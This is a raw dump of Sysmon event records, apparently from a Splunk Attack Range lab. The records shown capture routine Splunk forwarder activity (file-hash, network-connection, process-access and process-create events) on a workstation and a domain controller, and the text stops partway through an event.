23542300x8000000000000000215507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:10.619{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=728A24B1F8DAE7A73B069A9C6098EE88,SHA256=F13EA1088CC4AD02A02D7550408064C9074DAFF01CE22E36F34531D991D86E01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:10.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D3FFCEEEB5301C843F90CB3E73E63E,SHA256=25BDB99EF84D50CCDA8DDBE073DE90B7E1D0C1578223C3AB3CECD02802A8AE3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:07.527{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51261-false10.0.1.12-8000- 23542300x8000000000000000215508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:11.635{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E96793570FF35237DB89503607D4318,SHA256=A48C5745FAEAD4172CCFDD081DFD118F69C054F5933A426B1861B2A3DECCA346,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.575{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:11.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C1416DCECA19CC2E67E55B724F7FD1,SHA256=A0919002C5096448A30F188E111FB46D03B907F7AA0DCD17B65A35B2086D1A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:12.257{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B8E065AEEE57E541E3E78F1AC106A5,SHA256=24EAD8A3EE068798D2AEB289DFA4E30ED99698B9B894FD3E1AF54E9A6452139A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:12.635{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8940665EF912307ACEAE32A0F610FA9,SHA256=9155C42164F22F16D48EC79D68F99AB9BE910A88C59B25001DF0373AF5BE4BD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:13.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6572EB57608439ED6D96D59DB598FF3C,SHA256=41198382683AEFA75E458F1622E5B377E83A8BF4755C8C34B0E9190332549EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:13.382{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCB61D96C03054430A42AB3442C531D,SHA256=51DFBFB19AF0A884A0304B724A217084BA6BAF6FA00A6E7F3F0729B462CD9D8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:12.683{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51262-false10.0.1.12-8000- 23542300x8000000000000000215511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:14.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=444BD93A1CF380DF1B1E0ABDA4A1E3AF,SHA256=E2F371EA156D290733DD5CF6589AFCCDC928EB59E5D8A8394BD4CA6305E4C04B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:14.429{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56CB9771582EDB41969B63ED4ABFC8EE,SHA256=7B31487278F428F985833B260FE71FB834D15DFB0179E30875E5DEF5F6C6DC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:15.650{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E3E4D808383CEC69A595B59A82B4C3,SHA256=FC205268F74A3AAD3498EB66CE91348D052791A9750AE96B6A5E5855A847C312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:15.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC4596375E645B95B179C8938CB76680,SHA256=E5B3A81E1ED757DCAD23AF6C9ACB6B9A5FBF1DCEEB7D1A88E2D4FAFFDB947640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:16.728{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F14C8F6F6E9382DE981F8D2A22041D1,SHA256=34D91058FDFB6DE4949DC85777F3824B1DD2955BA19AE0915E6AEDBE6990663D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:16.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CB3CAB8C39CC12757B48B0041B374F,SHA256=28F23F0A619564F72261443FCB4287545EE51DE5DDB217B1F05DC6CDE0DAE18C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:17.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAEF04E342F833BFB8C3C36ACE30B3E9,SHA256=AAAD08844928C764E61D33732D24E005613EEAF35D8468FEC9C47674E4C3A6FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:17.760{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEC609C5042E06D1513C5CA0EB7880EA,SHA256=1567643FC2730F32479684F7AAC95800B956D36E591CE73E69EC998584BA1C7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:14.684{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53346-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:18.775{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B34A0DDFD9608028F816635A8E5DC63,SHA256=A0535458B4871738B67545844B0FDF54C5AC6102BB5E87FC0235D679CCAD22BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:18.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9CCD953BDA86E4575AF247FFC9B5D5B,SHA256=4B0FEB03FBD23CB469B232330841887206485465049B43B879B79FE225403509,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:19.807{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6F16E50A513413FF502D52BFCD01E0,SHA256=7BED7BCE29C24C68D1D05F2383CFDBF708DDA64A1704905DF51E8B0320AEE7A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.820{C8EA50B7-1003-6216-DD04-000000003802}29365932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3183993E5F7D9C9402CFDA3F9D0E3F,SHA256=DBD0D686184AF234E97C05B6D158D5A746A3D5564E09F768AF1194E4FA0F61EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1003-6216-DD04-000000003802}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1003-6216-DD04-000000003802}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.460{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1003-6216-DD04-000000003802}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:19.461{C8EA50B7-1003-6216-DD04-000000003802}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.945{C8EA50B7-1004-6216-DF04-000000003802}60245812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1004-6216-DF04-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 